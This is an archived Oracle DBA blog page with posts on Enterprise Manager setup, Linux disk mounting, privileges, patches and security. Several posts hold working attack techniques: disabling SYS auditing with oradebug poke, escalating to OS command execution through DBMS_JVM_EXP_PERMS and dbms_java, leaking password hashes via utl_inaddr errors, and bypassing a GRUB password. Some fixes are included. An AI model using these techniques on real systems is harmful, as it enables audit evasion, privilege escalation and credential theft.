Monday, April 29, 2013

Start/Stop Oracle Enterprise Manager 12c

To Start enterprise manager 12c you need to follow the below steps :

export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

  • ensure database and listener is running
  • Run the below command from $OMS_HOME
emctl start oms

  • Run the below command from $AGENT_HOME
emctl start agent 

to Stop all the services you need to do the below :

 export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1
export OMS_HOME=/u03/app/oracle/Middleware/om12c/oms/
export AGENT_HOME=/u03/app/oracle/Middleware/agent12c/agent_inst/

  • Run the below command from $OMS_HOME
emctl stop oms -all

  • Run the below command from $AGENT_HOME
emctl stop agent 

  • Now you can shutdown database and listener.


Thank you
Osama mustafa

 



Step By Step to Install Enterprise Manager 12c on Redhat 6.1

in this article you will have a look how to install Oracle Enterprise manager 12c ( em12c ) on Redhat 6 update 1 Operating system.

First Step is select supported OS and Database to install repository. and you can check about certification and to do that :


1.Log in to My Oracle Support, which is accessible at the following URL: https://support.oracle.com
2. Click the Certifications tab.
3. In the Certification Search region, select Enterprise Manager Cloud Control from the Product list.
4. From the Release list, select 12.1.0.2.0, then click Search.
5. Expand the Databases node.


after checking the certification you need to install the following :
  • Enterprise manager 12c from here.
  • Redhat 6 from here
  • if you install on Linux 64bit you need to apply Patch 10404530 Download from here.
Enterprise manager needs the following Requirement :
Hardware
Minimum: 6 GB of RAM.
Disk Space Requirements 30Gb to 50Gb for installation of the software.

Software

OMS Package

make-3.81
binutils-2.17.50.0.6
gcc -4.1.1
libaio-0.3.106
glibc-common-2.3.4
libstdc++ -4.1.1
sysstat-5.0.5
glibc-2.5.12
glibc-devel-2.5-49
agent Package

make-3.81
binutils-2.17.50.0.6
gcc -4.1.1
libstdc++ -4.1.1

I will not mention the prerequisites since in 11gr2 and 12c while installation it will give what missing in OS, Database configuration and fix it thru installation, and if missing package found ,  the package name will appear and all you need is install it from media ( OS CD/DvD).

you need to configure database also before start install em12c :
  • Remove Dbconsole from database with the below command :
emca -deconfig dbcontrol db -repos drop

  • Change the below database parameters :

ALTER SYSTEM SET processes=300 SCOPE=SPFILE;
ALTER SYSTEM SET session_cached_cursors=200 SCOPE=SPFILE;
ALTER SYSTEM SET sga_target=2G SCOPE=SPFILE;
ALTER SYSTEM SET shared_pool_size=600M SCOPE=SPFILE;
ALTER SYSTEM SET pga_aggregate_target=1G SCOPE=SPFILE;
ALTER SYSTEM SET job_queue_processes=20 SCOPE=SPFILE;
ALTER SYSTEM SET open_cursors=300 SCOPE=SPFILE;

  • Restart Database.
  • create new folder to install em12c 
mkdir -p /u02/app/oracle/middleware/
cd /u02/app/oracle/middleware
mkdir om12c
mkdir agent12c 

  • you suppose to finish download unzip and start install (./runInstaller).
I will Provide you with Screenshot for the installation :

Asking for MOS account

Asking for Updates 


 Check prerequisites

Sometimes you will receive warning related to glibc error Press Yes:

Now you need to choose installation type
Choose location where you want to install
Middleware location : /u02/app/oracle/middleware/oms12c
Agent Location : /u02/app/oracle/middleware/agent12c


Next Screen you need to choose password and create connection with database


On the first warning dialog, click the "Yes" button to disable the stats gathering job.


review :

During the installation :




Done

also you can download this article from here

Thank you
Osama mustafa


Sunday, April 28, 2013

Add New Mount On Linux ( Redhat 6)

Sometime you need to add new mount to Linux after creation the following article will describe how to do this , all the steps tested on Redhat 6.1 , after add disk


[root@localhost Desktop]# fdisk -l
Disk /dev/sda: 85.9 GB, 85899345920 bytes
255 heads, 63 sectors/track, 10443 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000be2c2
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1         262     2097152   83  Linux
Partition 1 does not end on cylinder boundary.
/dev/sda2             262        2220    15728640   83  Linux
/dev/sda3            2220        3525    10485760   83  Linux
/dev/sda4            3525        7833    34601984    5  Extended
/dev/sda5            3525        4831    10485760   83  Linux
/dev/sda6            4831        5484     5242880   82  Linux swap / Solaris
/dev/sda7            5484        5745     2097152   8e  Linux LVM
/dev/sda8            5745        7833    16772096   83  Linux
Disk /dev/sdb: 26.8 GB, 26843545600 bytes
255 heads, 63 sectors/track, 3263 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000
as you see in the red line , I added disk with size 26G.

I need to prepare this disk :

[root@localhost Desktop]# fdisk /dev/sdb

Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0xe88f8de7.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
WARNING: DOS-compatible mode is deprecated. It's strongly recommended to
         switch off the mode (command 'c') and change display units to
         sectors (command 'u').
Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-3263, default 1):
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-3263, default 3263):
Using default value 3263
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
After create disk i need to format the disk i choose ext3 :

[root@localhost Desktop]# mkfs -t ext3 /dev/sdb1
mke2fs 1.41.12 (17-May-2010)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
1638400 inodes, 6552504 blocks
327625 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=0
200 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000
Writing inode tables: done                          
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done
This filesystem will be automatically checked every 28 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.

Link the disk with new folder 

[root@localhost Desktop]#mkdir /u03
[root@localhost Desktop]# mount -t ext3 /dev/sdb1 /u03
[root@localhost Desktop]#
[root@localhost Desktop]#
[root@localhost Desktop]#
[root@localhost Desktop]# df -h
/dev/sdb1              25G  173M   24G   1% /u03
Don't forget to add to /etc/fstab 

Thank you 
Osama mustafa

Friday, April 26, 2013

ORA-00838: Specified value of MEMORY_TARGET is too small,

SQL> startup
ORA-00838: Specified value of MEMORY_TARGET is too small, needs to be at least 3072M

make your calculation 3072*1024*1024 = 3221225472

SQL > create pfile='/u02/backup.init' from spfile;

edit file and put the above number in memory_target.

SQL > Create spfile from pfile='/u02/backup.init' ;

SQL > Startup ;


Thank you
Osama mustafa

Thursday, April 25, 2013

SQL92_SECURITY Parameter

SQL> show parameter sql92_

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
sql92_security                       boolean     FALSE
SQL92_Security seems it's parameter related to Security But what is it ? what is the benefits of using this parameter ?

I will describe this example since it will be understandable :)

SQL> create user test1 identified by test1 ;

User created.

SQL> grant create session , Create table to test1 ;

Grant succeeded.

SQL>
SQL>
SQL> create user test2 identified by test2 ;

User created.
 SQL> create user test3 identified by test3 ;

User created.

SQL> grant create session to test3 ;

Grant succeeded.
SQL> conn test1/test1 ;
Connected.
SQL> create table new ( id number(20)) ;

Table created.

SQL> BEGIN
    FOR v_LoopCounter IN 1..50 LOOP
    INSERT INTO new (id)
    VALUES (v_LoopCounter);
     END LOOP;
         END;
   / 

PL/SQL procedure successfully completed.
SQL> conn test1/test1 ;
Connected.
SQL>
SQL>
SQL>
SQL> grant update on test1.new to test2 ;

Grant succeeded.
 
SQL> grant update on test1.new to test3;

Grant succeeded.

SQL> grant select on test1.new to test3;

 SQL> conn test2/test2 ;
Connected.
SQL> update test1.new set id=1 where id=10 ;

1 row updated.

SQL> conn test3/test3 ;
Connected.
SQL> update test1.new set id=10 where id=1 ;

2 rows updated.
Now let's set SQL92_Security to TRUE and Restart Database and re fire the same query by each user.



Conn test2/test2
SQL>update test1.new set id=1 where id=10 ;
ERROR at line 1:
ORA-01031: insufficient privileges
SQL> conn test3/test3;
Connected.
SQL> update test1.new set id=10 where id=1 ;

2 rows updated.
What Happening Here , Each of users have Privileges on test1.new but why after set SQL92_Security to true test2 not working ?

Simply  SQL92_SECURITY need Update/delete and Select Privileges for the same user if you the user grant one of these privileges then it will be useless.

Amazing :)


Thank you
Osama Mustafa

Tuesday, April 23, 2013

Short Look for Oracle Privileges

Oracle Database Contain two type of privileges one called System and other called Objects each one grant it to use as they need, But interesting entity called Public. it's more Role than users , and every user created in database assign to Public by default unfortunately nothing can be done to change that. so we can say it's seems like User Group, so if you grant anything of privileges to public this means that everyone of users database will have this privilege ( System or Object ) So you need to becareful of you doing while dealing with public.

Public is everyone access to database .PUBLIC is an entity that can be granted any privilege and assigned any role. All database users automatically inherit all the rights assigned to PUBLIC. It’s a simple concept designed for convenience. Granting permissions to PUBLIC is easy to do, and often the easiest way to get a system working, however, the security implications of using the PUBLIC group to assign permissions are significant.PUBLIC should be treated with care and used sparinglyPUBLIC should be treated with care and used sparingly.

Before go deeply with this subject we need to understand Role and Privileges in oracle database,as you all know Oracle Privileges control the rights to see, you could Modify, create or alter database depend on privileged you have,as i mention earlier two Privileges in database exists System and Object.

System privileges are not related to any specific object or schema. Object privileges are just the opposite, those that are directly related to a specific object or schema.check the examples below

System Privilege
Object Privilege
GRANT ANY PRIVILEGE
GRANT
ALTER ANY ROLE
ALTER
ALTER DATABASE
SELECT


to check system privileges in database you need to check the following DBA_ DICTIONARY :

SQL> desc dba_sys_privs;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 GRANTEE                                   NOT NULL VARCHAR2(30)
 PRIVILEGE                                 NOT NULL VARCHAR2(40)
 ADMIN_OPTION                                            VARCHAR2(3)
Sample data From table :


GRANTEE                        PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYS                            CREATE OPERATOR                                 NO
SYS                            EXECUTE ANY OPERATOR                     NO
SYS                            CREATE DIMENSION                                NO
SYS                            ADMINISTER RESOURCE MANAGER     NO


Another example i want to check scott and his system privileges :


SQL> select * from dba_sys_privs where GRANTEE = 'SCOTT';
GRANTEE                        PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SCOTT                          UNLIMITED TABLESPACE                     NO
Now Let's Talk About Object Privileges :

SQL> desc dba_tab_privs;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 GRANTEE                                   NOT NULL  VARCHAR2(30)
 OWNER                                     NOT NULL  VARCHAR2(30)
 TABLE_NAME                          NOT NULL  VARCHAR2(30)
 GRANTOR                                 NOT NULL VARCHAR2(30)
 PRIVILEGE                                 NOT NULL VARCHAR2(40)
 GRANTABLE                                                  VARCHAR2(3)
 HIERARCHY                                                   VARCHAR2(3)
more complex huh ? Read Oracle Documentation Here

SQL> select OWNER, TABLE_NAME, PRIVILEGE, GRANTABLE from dba_tab_privs where GRANTEE = 'SCOTT';
no rows selected.
What about Roles ? as you we knows Oracle Comes with Pre defined such as DBA, Resource , and connect also you can create your own Role which is Set of privileges to manage Users Privileges.
 user can be a member of more then one role, and roles can even be members of other roles.
Users in company leaves their jobs , Travel or even don't need privileges in futures Create Oracle Role will make all this Manage is easy since . Privileges are then granted only to the roles, never to a specific user,if the privileges ever change, they are changed on the role and automatically take effect for all users with the role.and you check


SQL> desc dba_roles ;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 ROLE                                      NOT NULL         VARCHAR2(30)
 PASSWORD_REQUIRED                                  VARCHAR2(8)
For information about this table you can Read Oracle documentation here.

SQL> desc dba_role_privs
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 GRANTEE                                                   VARCHAR2(30)
 GRANTED_ROLE                  NOT NULL VARCHAR2(30)
 ADMIN_OPTION                                       VARCHAR2(3)
 DEFAULT_ROLE                                       VARCHAR2(3)
The above table checks the privileges granted to Role, you can refer to Oracle Documentation here
check the below query to determine Which User Have DBA Role :

SQL> select GRANTEE, ADMIN_OPTION, DEFAULT_ROLE from dba_role_privs where
GRANTED_ROLE = 'DBA';  2
GRANTEE                        ADM DEF
------------------------------ --- ---
SYS                                  YES YES
SYSMAN                         NO  YES
SYSTEM                         YES YES
As conclusion Public can be Granted any of Roles or users,While it is easy and fully supported to grant roles to PUBLIC i don't recommended to do that  give one case why to do that ?

Check the user who has Public  :

SQL> select * from dba_role_privs where GRANTEE = 'PUBLIC';
no rows selected
And this exactly what we want not Public roles to any users.

Thank you 
Osama Mustafa

Monday, April 22, 2013

what is oracle inventory


While installing Oracle software new folder Directory created in ORACLE_BASE called oinventory  what is it ? and what the benefits of using this folder ? What kind of information will be stored ?

The inventory is created once you install Database or used for upgrades and patches. two kind of oracle inventory  one called central inventory per server and another one called local inventory for each ORACLE_HOME, the difference between each of them central inventory basically contains a high-level list of components installed on the server. It is updated each time components are installed or uninstalled but it does not have detailed information such as the patch level of each ORACLE_HOME. on another hand  local inventory  contains some component information included with patch-level information.

another different is The Central Inventory contains the information related to all Oracle products installed on a host. and consists of a file called inventory.xml, which lists all the Oracle Homes installed on the node.
for local inventory ( $ORACLE_HOME/inventory ) that contains the detail of the patch level for that ORACLE_HOME. The Local Inventory gets updated whenever a patch is applied to the ORACLE_HOME, using OUI. If the Local Inventory becomes corrupt or is lost, this is very difficult to recover, and may result in having to reinstall the ORACLE_HOME and re-apply all patchsets and patches.

For More Information about this topic refer to MOS : 
 Global and Local Inventory explained [ID 360079.1]
FAQs on Central Inventory and Oracle Home Inventory (Local Inventory) in Oracle RDBMS [ID 564192.1]

Thank you 
Osama mustafa

Saturday, April 20, 2013

Disable Auditing Using Oradebug

in 2011 Laszlo Toth Show some Oracle tricks to disable Auditing In Oracle Database included with SYS auditing using simple command Called oradebug, Just as note oradebug is undocumented in all oracle versions and if you have sysdba role privileges you can do a lot of things with this command :

the below is the demonstration :


sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‘kzaflg_%’;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

Just as note with oradebug you Audit vault become useless. another tricks that we can use oradebug to call Database command using OS :) 

SQL> oradebug call system    “ls -la >/tmp/hacktivity.txt”

Thank you
Osama mustafa

Wednesday, April 17, 2013

Oracle Critical Patch Updates for April 2013


The Critical Patch Update for April 2013 and The Oracle Java SE Critical Patch Update for April 2013 were released on April 16th, 2013. Oracle strongly recommends applying the patches as soon as possible. Please note that Sun products are included in this Critical Patch Update.

And you can download it for free from the below :

Oracle Technology Network Press Here
Oracle Techonolgy Network Page to Download CPU patch here
Oracle Jave SE Patch Press Here




Thank you
Osama mustafa

Oracle Security --> Where to Start ? What to do ?

When you start reading the title you start thinking of Race, Mostly you can think of that since technology going fast, But my article it's not about race it's talking about where should i look when i secure my database what should i secure ? I post another articles talking about security and how to secure your database what is the benefits of securing database ? I will try to mention the most important points to secure and protecting database specially internal users.

Database is complex, so DBA ( Database administrator ) must understand potential security impacts  and The three components Triangle which i mentioned before in "Top ten Threats to Database" For example when DBA looking for availability they ignore right configuration which cause security vulnerability and this can lead to expose confidential data. it's not about database if you have application you need to take over and start secure this application. but what can i do ? Where to start and how to start ? 

The Basic Steps to Start like i mentioned in my post "basic Steps to Secure Oracle"  is to discuss the risk management that lead to this, and you can secure your database by looking for the below keys  :

  • Auditing
  • Database Configuration
  • Access to database
  • Authentication 

I need to Remind you in something Secuirty Not means i will protect my database 100% it's way to prevent attacks and make it harder, But what if the attackers get in database 

Auditing 


Auditing allow us to monitor database users,or anything that happened on database,first audit_sys_operations parameter should be set to TRUE to monitor sys user operation. The audit_trail parameter ( DB|OS) where the location of Audit files will goes ? For example Audit Files could be written on Database  or On File System if you set this parameter to OS. let's talk about database here :


SQL> SELECT * FROM dba_obj_audit_opts;
SQL> SELECT * FROM dba_priv_audit_opts;
SQL> SELECT * FROM dba_stmt_audit_opts
 you cannot enable auditing to monitor all database activities but at least you can enable it for action such as create session , by fire this command ---> audit create session;

What i love in 11gR2 documentation is that Oracle has create it's own list for recommended auditing list which mean you should enable it. another type of auditing called FGA allow you to create policy to run on certain event for example when scott read from table emp column Sal i want to record this transaction on table. simple way read more about : ---> DBMS_FGA.ADD_POLICY, and check this event to you need to have access on sys.fga$.

After you enable auditing it's very important to Create your own reports to monitor database.Oracle gives you products to centralize this audit logs called audit vault the benefits of this products it's automatically clean up the old data ( only if transferred to server ) and remove them.

 Database Configuration

When start talking about secure configuration lot of steps came to my mind, but i will try make simple since i can't cover everything in this topics, i will divide it to more than one topics and Post on my blog, as you know in this part you have to look at network, Listener , Client side , Parameters , and Backup i am apology if i forget something, each part of this compentents are very important but let's talk about parameters as we all know Database have something called spfile/pfile which is parameter file for database, Some of parameter set for TRUE by default while i don't need them vice versa, change the value of this parameter are important to avoid any Weakness in the futures some of this parameters are :

  • OS_ROLES ----> Should be False 
  • os_authent_prefix ---> Ops$ 
  • o7_dictionary_accessibility --> Should be False 
  • audit_sys_operations --> Should be True
  • Global_name ---> Should be True
  • Remote_listener ---> use it only if you need it
  • remote_login_passwordfile --> none 
  • sec_case_sensitive_logon --> Should be True
  • sql92_security ---> Should be True 
  • remote_os_roles --> Should be False
lot of parameters, but i mention some of them.

Also Don't forget to secure your Listener set password for listener, change default port simple steps but make you avoid future attack.
Another point don't forget to patch your database check oracle site for you new CPU and PSU patch this will fix security vulnerability, Read More here.
 Another way also to secure configuration using Database firewall ( i will post topic about it later ) , network firewall and create policy inside the company.

Access to database


in each topic i post i am talking about this, i am will mention it in every topics in the future it's important and the most of hacking cases happened because user has privileges more than he needs why ?  is your data not important !!! when the user authenticated to database first thing you need to check what this user allow to do ? especially for developers and application user ( dose he need DBA role to execute procedure ) 

 SQL> SELECT * FROM dba_sys_privs;
SQL> SELECT * FROM dba_role_privs;
SQL> SELECT * FROM dba_col_privs;
SQL> SELECT * FROM dba_tab_privs;

it's not only about privileges , Create Development , test and QA database is important not everything works on Production is correct , create new users with different privileges some of them to monitor some of them to manege, Boring but Useful , Don't forget Database links i mention before in my topics about database link security and how this could effect on your database, well Links create new privileges escalation, Review database link and check who access to them , who use them , how he use them and is it valid any more ?

SQL> SELECT * FROM sys.link$;

as conclusion you have to check user privileges , Application users , Users , Database links and Create new instance for new jobs ,  not all company spend money to secure database but why should i buy new products while i am not doing the basic steps before that , it's maybe avoid company small fortune and they will loves for that.

Authentications

Well , I should mention it first but it's all about security why should i care ? the first thing happened in database is authentications obtaining user information , Password the problem is The mutli way for doing that make risk is high you have OS authentications .... etc check my post about "Effect of Default Password" and you will be surprised what i can do with default password !!! in 11g you can check the Deafult password in new View :


SQL >  select * from dba_users_with_defpwd;
But you can't also forget about
SQL > Select * from dba_users;

each of them has different job, not everything mentioned in dba_users_with_defpwd , Once you change password and Create new one ( hard to guess ) now you need to provide new rules for password here we start talking about profiles

SQL > Select * from dba_profiles ;
Example for how to create profile in oracle :

CREATE PROFILE Example LIMIT
  FAILED_LOGIN_ATTEMPTS 3 
  PASSWORD_LOCK_TIME 5    
  PASSWORD_LIFE_TIME 30   
  PASSWORD_GRACE_TIME 3   
  PASSWORD_REUSE_TIME 120 
  PASSWORD_REUSE_MAX 10   
/
Also read Oracle documentation here.

I will take later about Authentications type In oracle provided with Examples and talk about which one is more secure and when i need to use it ?

Don't forget that Oracle Provide Password complexity that located in $ORACLE_HOME/rdbms/admin with Script called --> utlpwdmg.sql just run it / as sysdba and new rules will be applied to passwords you can create your own one. but this script do the below
  • The password contains  eight characters or more.
  • Password not same as username.
  • password should not be simple 
  • password should contain Numeric and alphabetic.
  • password should be different from the last password.
and other's features simple and amazing Right :)

as conclusion i will post more topics about security and more examples will be waiting, and i wish it's useful and simple, i can't cover all things in one article i will be huge i will try to do my best.

Thank you
Osama Mustafa

Tuesday, April 16, 2013

ORA-1461 encountered when generating server alert SMG-3500

Two bug could be related to this error  Bug 6085625 and unpublished bug 6452485.

to fix the above bug you need to apply  Patch 6602742 or Patch 6602482 Depend on your case


as workaround you have to optiosn :

A. Flushing the shared pool can help remove the problem cursor from the shared pool.
B. Or set SESSION_CACHED_CURSORS = 0


Thank you
Osama mustafa

Monday, April 15, 2013

Oracle APPS DBA vs Oracle DBA

Name Different In One Thing Apps , Both Are DBA for the same corporation but before going further you need to know what the definition for both of them what APPS DBA mean and What Oracle DBA mean ?

Oracle DBA ( Database Administrator ) is the person who responsible for administration , Monitor , tuning and recover database ( Failure cases ) For Oracle Database this Person Called Oracle DBA.

Lot of Jobs and Tasks for this Person



  • Installing and upgrading the Oracle server and application tools
  • Allocating system storage and planning future storage requirements for the database system
  • Creating primary database storage structures (tablespaces) after application developers have designed an application
  • Creating primary objects (tables, views, indexes) once application developers have designed an application
  • Modifying the database structure, as necessary, from information given by application developers
  • Enrolling users and maintaining system security
  • Ensuring compliance with your Oracle license agreement
  • Controlling and monitoring user access to the database
  • Monitoring and optimizing the performance of the database
  • Planning for backup and recovery of database information
  • Maintaining archived data on tape
  • Backing up and restoring the database
  • Contacting Oracle Corporation for technical support


For More Information Read oracle Documentation Here.

in he big company that required 24/24hr monitor for more than one database therefore you cannot assign everything to this person he will be killed. So two kind of DBA appeared to reduce Tasks 
Development DBA   & Production DBA each one of them has it's own job and Tasks.

Development DBA: 
well from the name you can see it's person who works closely with developers team to make sure database design and performance are working find without any problems.

Production DBA
Person who responsible to ensure that Database for this company is healthy and running without any problem it's not easy job since this type of Database is the main database for company so you have to ensure it's working fine or you will be fired.

I mention before of my blog how to become DBA and what you need to do that ? Good understanding of the Oracle database,  understanding of the underlying operating system ,  how Oracle acquires and manages resources, knowledge of both database and system performance tuning,communication skills , management , and ability to handle multiple projects and deadlines all this Hints to become DBA. Read my Post About "how to become DBA" Here 

After you have small knowledge about DBA tasks and What he is doing ? Let's talk about APPS DBA.

Simply the equation :
ORACLE APPS DBA = Application* + Database.

*Which Application is Fusion Middle Ware Products from Oracle.

If you are aware of all the previous tasks  then you are able to be Oracle APPS DBA, Oracle APPS DBA include all Oracle DBA tasks and it's very huge subject to learn and explorer.

So the Task for APPS DBA :
  • All Oracle DBA tasks.
  • Patching
  • Cloning 
  • Maintenance Oracle Application.
  • Installations Oracle EBS.
So as conclusion Oracle APPS DBA is an Oracle DBA because of this he can switch easliy between this job Role, and don't let this disappointed you also Oracle DBA can switch to APPS DBA but he must read LOT.

Thank you 
Osama Mustafa  


Describe Oracle Patches

Regarding to Oracle Documentation patch is program (set of instructions) to fix a particular problem or enhance/ add a particular feature in existing program/product/software. And There's Four kind of Oracle Patches :

  • One-off patches (bug fix)
  • CPU (security patches)
  • Upgrade patches (bug fixes)
  • PSU (bug fixes are security patches)
There's another kind called Bundle Patched for windows and exadata.
The most two kind of patch that people get little confused about them is CPU and PSU what are they ? when should i use them ?  is there any different between them ?

First Thing you need to know about them since they have different name then sure it's have different.

CPU:  security fixes each quarter rather than the cumulative database.

PSU : same as CPU  patches but include both the security fixes and priority fixes.Note Once a PSU is applied, only PSUs can be applied in future quarters until the database is upgraded to a new base version.
Which mean you can't Apply CPU and PSU and same database.

Some MOS note that could be Useful :

Introduction to Oracle Patch Set Updates (PSU) 854428.1
Quick Reference to Patchset Patch Numbers [ID 753736.1]
Quick Reference to Patch Numbers for Database PSU, SPU(CPU), Bundle Patches and Patchsets [ID 1454618.1]
New Patch Nomenclature for Oracle Products [ID 1430923.1]

PSU  contain fix for bugs that cause Instance crash,Wrong results and Data Corruption on the other hand Dictionary changes , Major Algorithm changes ,and Optimizer plan changes not fixed by PSU.

to check Applied PSU patched you need to run :
opatch lsinventory -bugs_fixed | grep -i 'DATABASE PSU'
 and if you need to check CPU :
 Select * from registry$history;

Thank you
Osama mustafa

Saturday, April 13, 2013

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield, Also you need to know this way of hacking it's only works on Windows and Oracle database version infected 10gR2,11gR1  and 11gR2.

The below demonstration explain how to use it :

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
'GRANT','GREMLIN','SYS','java.io.FilePermission','<FILES>>','execute','ENABLED' FROM DUAL; 
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;
  /

PL/SQL procedure successfully completed.

SQL> CONNECT / AS SYSDBA
Connected.

SQL> COL TYPE_NAME FOR A30;
SQL> COL NAME FOR A30;
SQL> COL ACTION FOR A10;
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = 'TEST';

TYPE_NAME                      NAME                           ACTION
------------------------------ ------------------------------ ----------
java.io.FilePermission         <>                  execute

As you see at first User Test Only has Create Session Privileges but after using the above package he now can execute any OS Command using Java Code.

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

To secure your database against this :

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Thank you
Osama Mustafa

Friday, April 12, 2013

Hack Sys Password With Simple Way

Sometimes you want to know the SYS password with simplest way, well check the below if you have any User with DBA role then you can do that :

SQL>  select utl_inaddr.get_host_name((select username||'='||password from dba_users where rownum=1)) from dual;

 select utl_inaddr.get_host_name((
        *
ERROR at line 1:
ORA-29257: host SYS=8A8F025737A9097A unknown
ORA-06512: at "SYS.UTL_INADDR", line 4
ORA-06512: at "SYS.UTL_INADDR", line 35
ORA-06512: at line 1
Now You can use any Software or Online Site to Hack This Password

Thank you
Osama Mustafa

Monday, April 8, 2013

Basic Database Securiy GuideLines

Implementing any Database Security is not easy process which it's Complex since the security has to be looked at OS Layer, Database, Network , application code, and backup lot of things you need to check if you need secure database you can't ignore one part of this components.

You need to know even experts/Guru dose not have complete understanding for this list, maybe they have knowledge about it but not that much, But the most important things in securing database ( new one ) or securing application is early understanding security model very early in the development process  and how to develop it. you can read the this book  "Oracle security: Step-by-step" by Pete Finnigan he mentioned lot of basic steps to secure oracle database.


From a high level perspective, security is always about risk. If you think that your system is impenetrable, think again. Someone else will always be building a better mousetrap.

For example if we asked ourself as DBA About SQL injection one of the TOP ten Threats in Database
it happens because somebody is writing a Web application that accesses your database which mean if this code writes incorrectly, what happened if the hacker get access to your database thru this code.because of this DBA needs to understand who is access to database  and make sure the developers are accessing in a secure way.

Internal/External hacker going to search for Holes in your application to get in,as we know there's one of attack type used called Buffer Overflow because of this you need to keep you system is up to date patched like usual people most of them not doing that since they worried about if that patch will broke their system or application.

Today a lot of people are ignoring the security side of the job. Many companies don't have the resources. Until you get hacked, and until you lose data, then you think you can get by with minimal security.

I mention before the in my article about Basic steps to secure Oracle Database some of this article provided with examples i will advise today to bookmark this to keep updated with Oracle Security patches lot of tips to talk about and need to share it here as soon as i can.

Thank you
Osama Mustafa

ORA-0131: insufficient privileges/could not validate ASMSNMP password

This error related to ASM instance, Usually it's happened when you are trying to create dbconsole the solution is simple and not that complicated just follow the below instruction.


Choose one of Rac ( Real Application Cluster ) and fire the below command under grid user :

 orapwd file=/u01/app/11.2.0/grid/dbs/orapw+ASM password=

Now Move the  (orapw+ASM) to other nodes using scp and any FTP software as you like. to know about scp here. check the below example :

scp orapw+ASM :/u01/app/11.2.0/grid/dbs/


Back to Oracle User :

export ORACLE_SID=+ASM1
export ORACLE_HOME=/u01/app/11.2.0/grid
$ sqlplus / as sysasm
SQL>create user asmsnmp identified by ;
SQL> grant sysdba to asmsnmp;

Thank you
Osama Mustafa

Saturday, April 6, 2013

Hack Root Password With Protected Grub

I post before Article talking about "Hack Root Password With Protected Grub" Here .

But what if GRUB was Locked By password and you forget Root Password, There's always away to do it but you need the same media for Operating system ( Never tried to use different distribution ) after boot :






In the above screen Type " linux rescue " and then Press enter

After follow the instruction and Enter Bash

chroot /mnt/sysimage [Enter]
cd /boot/grub [Enter]
vi menu.lst

Now In that file you see word "Password"  Remove Line, This will remove Grub password after save it the OS will Reboot but this time Grub will be UN-Protected , Remove CD and follow the normal instruction in Article Number one Here.

Thank you
Osama Mustafa


Thursday, April 4, 2013

rdesktop: A Remote Desktop Protocol Client

